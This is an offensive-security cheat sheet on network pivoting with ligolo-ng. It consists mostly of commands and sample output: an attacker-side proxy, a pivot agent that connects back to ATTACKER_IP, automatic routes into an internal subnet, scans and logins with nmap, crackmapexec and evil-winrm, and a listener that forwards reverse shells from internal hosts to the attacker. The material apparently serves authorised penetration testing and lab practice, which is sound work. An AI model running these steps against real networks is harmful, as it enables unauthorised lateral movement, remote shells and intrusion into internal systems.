LIGOLO-NG (ADVANCED PIVOTING)

Start proxy (attacker)

Run on attacker — Proxy server

ligolo-proxy -selfcert -laddr 0.0.0.0:443
Example Output
ligolo-proxy -selfcert -laddr 0.0.0.0:443
INFO[0000] Listening on 0.0.0.0:443

Agent connects:
INFO[0005] Agent joined: john@pivot (172.16.1.5)

>> session
>> autoroute
>> start
(Direct access to 172.16.1.0/24, no proxychains needed)

Start agent (pivot)

Run on pivot host — Connects back to proxy

ligolo-agent -connect ATTACKER_IP:443 -ignore-cert
Example Output
./ligolo-agent -connect 10.10.14.2:443 -ignore-cert
[*] Connection established
[*] Waiting for proxy configuration
(Agent running on pivot, connected to your proxy)

Add route and start tunnel

In ligolo proxy interface — Adds route to internal network

session (select session)
autoroute
start
Example Output
ligolo>> session
  1 - john@pivot - 172.16.1.5
ligolo>> autoroute
[+] Route 172.16.1.0/24 added
ligolo>> start
[+] Tunnel started
(Direct access to internal network, no proxychains needed)

Access internal network directly

No proxychains needed — Transparent tunnel

nmap INTERNAL_IP
crackmapexec smb INTERNAL_IP
Example Output
nmap -sT -Pn 172.16.1.10
crackmapexec smb 172.16.1.10
evil-winrm -i 172.16.1.10

(All tools work directly, no proxychains prefix needed)
(This is the main advantage of ligolo over chisel)

Add listeners for reverse shells

Forward reverse shells through tunnel — Internal targets connect to pivot, you get shell

listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
Example Output
ligolo>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp

On internal target: reverse shell to 172.16.1.5:4444
Shell arrives at your machine on port 4444
(Reverse shells route through the tunnel)